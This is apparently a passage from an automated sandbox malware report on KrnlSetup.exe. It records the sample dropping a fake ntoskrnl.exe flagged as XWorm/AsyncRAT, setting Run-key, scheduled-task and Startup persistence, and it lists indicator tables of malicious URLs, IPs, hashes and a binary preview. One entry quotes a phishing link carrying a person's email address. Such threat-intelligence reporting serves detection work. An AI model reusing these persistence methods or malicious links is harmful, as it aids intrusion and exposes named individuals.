                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • VT rate limit hit for: KrnlSetup.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              04:04:01API Interceptor63x Sleep call for process: powershell.exe modified
                                                                              04:04:56API Interceptor152x Sleep call for process: KrnlSetup.exe modified
                                                                              09:04:56AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
                                                                              09:04:57Task SchedulerRun new task: ntoskrnl path: C:\ProgramData\ntoskrnl.exe
                                                                              09:05:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
                                                                              09:05:12AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              104.20.3.235cr_asm3.ps1Get hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              gabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                                              • pastebin.com/raw/sA04Mwk2
                                                                              sostener.vbsGet hashmaliciousNjratBrowse
                                                                              • pastebin.com/raw/V9y5Q5vv
                                                                              208.95.112.1Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • ip-api.com/json/
                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                              • ip-api.com/json/?fields=8195
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              run.cmdGet hashmaliciousUnknownBrowse
                                                                              • ip-api.com/json/?fields=8195
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • ip-api.com/line/?fields=hosting
                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • ip-api.com/json/

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ip-api.comWh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1
                                                                              mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1
                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                              • 208.95.112.1
                                                                              run.cmdGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 208.95.112.1
                                                                              f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 208.95.112.1
                                                                              R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1
                                                                              pastebin.comRevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                              • 172.67.19.24
                                                                              Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.20.4.235
                                                                              Microsoft.docGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              a9YMw44iQq.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 172.67.19.24
                                                                              nlGOh9K5X5.exeGet hashmaliciousXmrigBrowse
                                                                              • 172.67.19.24
                                                                              cJ6xbAA5Rn.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.19.24
                                                                              api.telegram.orgSALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                              • 149.154.167.220
                                                                              FATR98765678000.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              run.cmdGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              TELEGRAMRUSALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                              • 149.154.167.220
                                                                              APQSKVTvd60SdAM.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              run.cmdGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                              • 149.154.167.220
                                                                              jXN37dkptv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 149.154.167.220
                                                                              1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                              • 149.154.167.220
                                                                              jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 149.154.167.220
                                                                              CLOUDFLARENETUSClient-built.exeGet hashmaliciousDiscord RatBrowse
                                                                              • 162.159.135.234
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.96.1
                                                                              sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                                                              • 172.67.156.226
                                                                              document.pif.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                              • 172.67.177.134
                                                                              sjoslin@odeonuk.com_print.svgGet hashmaliciousUnknownBrowse
                                                                              • 172.67.156.226
                                                                              Statement 2024-11-29 (K07234).exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.26.12.205
                                                                              Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 104.21.67.152
                                                                              SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 172.67.177.134
                                                                              https://santa-secret.ru/api/verify?a=NjgyODEwNCw1bWluOHE2MHpuX3J1LC9hY2NvdW50L2JveGVzLHZsYWRpbWlyLmdsdXNoZW5rb0Bob2NobGFuZC5ydSwyNDE0MTYzMg==Get hashmaliciousUnknownBrowse
                                                                              • 172.64.150.63
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 172.67.213.48
                                                                              TUT-ASUSWh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1
                                                                              mu3JuAyrj5.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1
                                                                              interior-design-villa-a23.lnkGet hashmaliciousMalLnkBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                              • 208.95.112.1
                                                                              run.cmdGet hashmaliciousUnknownBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                              • 208.95.112.1
                                                                              file.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 208.95.112.1
                                                                              f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                              • 208.95.112.1
                                                                              R55-RFQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 208.95.112.1
                                                                              YXHoexbTFp.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                              • 208.95.112.1

                                                                              JA3 Fingerprints

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              3b5074b1b5d032e5620f69f9f700ff0eClient-built.exeGet hashmaliciousDiscord RatBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              c2.htaGet hashmaliciousXWormBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              iboka6.htaGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              Statement 2024-11-29 (K07234).exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              SALARY_RECEIPT.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              aXxRRIGARH.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              aXxRRIGARH.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              Dfim58cp4J.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220
                                                                              Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              • 104.20.3.235
                                                                              • 149.154.167.220

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\ProgramData\ntoskrnl.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):89600
                                                                              Entropy (8bit):5.976406595215718
                                                                              Encrypted:false
                                                                              SSDEEP:1536:joG1/tjFDlZvSjvSr4wMiwTlVr6sQOvtbw++0W/QaIOAVg6h55OA34MKq5:joGjJD7EvBw7Y16sXvtbw+88OK5OA34C
                                                                              MD5:493AC3E54BAE1F0D5A31B68348352F6C
                                                                              SHA1:170C49A1115624E8FC5CAFE7C33F76E54CF31C7A
                                                                              SHA-256:C89625E4304D4708308A8A4138AF28B90D490E8BD29CCDF3BC1F567D9644A7D7
                                                                              SHA-512:5BAD0866843DD49D0197F38F9F9A9ED745373B4CEA2A6C70A1A1DC81B3FF8913B0B4825653BE71E7B65B93886BB27419BD7D61045476FEE13547F8D85ACF65BB
                                                                              Malicious:true
                                                                              Yara Hits:
                                                                              • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 74%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...._Mg.................T...........q... ........@.. ....................................@..................................q..W.................................................................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................q......H........q..........&.....................................................(....*.r...p*. ."..*..(....*.r7..p*. ....*.s.........s.........s.........s.........*.r...p*. M.).*.r...p*. o...*.r?..p*. *p{.*.r...p*. m(..*.r...p*. '^..*..((...*.r...p*. .O..*.rA..p*. ..e.*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r...p*. ....*.r-..p*. t...*.r...p*.r...p*.r5..p*. S...*.r...p*.r...p*.r=..p*. $M..*.r..

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KrnlSetup.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):1727
                                                                              Entropy (8bit):5.3718223239563105
                                                                              Encrypted:false
                                                                              SSDEEP:48:MxHKQwYHKGSI6o6+vxp3/elZHNpOtHTHhAHKKkt1qHGIs0HKD:iqbYqGSI6o9Zp/elZtpOtzHeqKktwmjB
                                                                              MD5:9714380A7DC1A8945C07B6C9DC8312B0
                                                                              SHA1:E6DF51F4C72B17485883378FDBF28D6BB5CFFDF3
                                                                              SHA-256:1DD30FC94BA3D3F97B5F250110A2639430AEB51FAE7A252F886AE2401EC31D4B
                                                                              SHA-512:876FB2C042F5FC60F6ACE9D143BA1A3AC9E200124EA3CB12476D10D24D82B4F2394F045E56FEB8906872D01B00BF9E646DEECC384144E21AEB6D6C10A365FB10
                                                                              Malicious:true
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ntoskrnl.exe.log

                                                                              Download File
                                                                              Process:C:\ProgramData\ntoskrnl.exe
                                                                              File Type:CSV text
                                                                              Category:dropped
                                                                              Size (bytes):654
                                                                              Entropy (8bit):5.380476433908377
                                                                              Encrypted:false
                                                                              SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                              MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                              SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                              SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                              SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:modified
                                                                              Size (bytes):64
                                                                              Entropy (8bit):0.34726597513537405
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlll:Nll
                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                              Malicious:false
                                                                              Preview:@...e...........................................................

                                                                              C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\KrnlSetup.exe
                                                                              File Type:Generic INItialization configuration [WIN]
                                                                              Category:dropped
                                                                              Size (bytes):58
                                                                              Entropy (8bit):3.598349098128234
                                                                              Encrypted:false
                                                                              SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                                                                              MD5:5362ACB758D5B0134C33D457FCC002D9
                                                                              SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                                                                              SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                                                                              SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                                                                              Malicious:false
                                                                              Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iqb1azf.mlz.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eq1jdts4.wqm.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f4t4ming.hkk.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gayx1igb.3cp.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxmagnok.2fe.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jpstcjh4.p4z.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nb21v4ep.2f3.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_phlt0bow.4ym.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
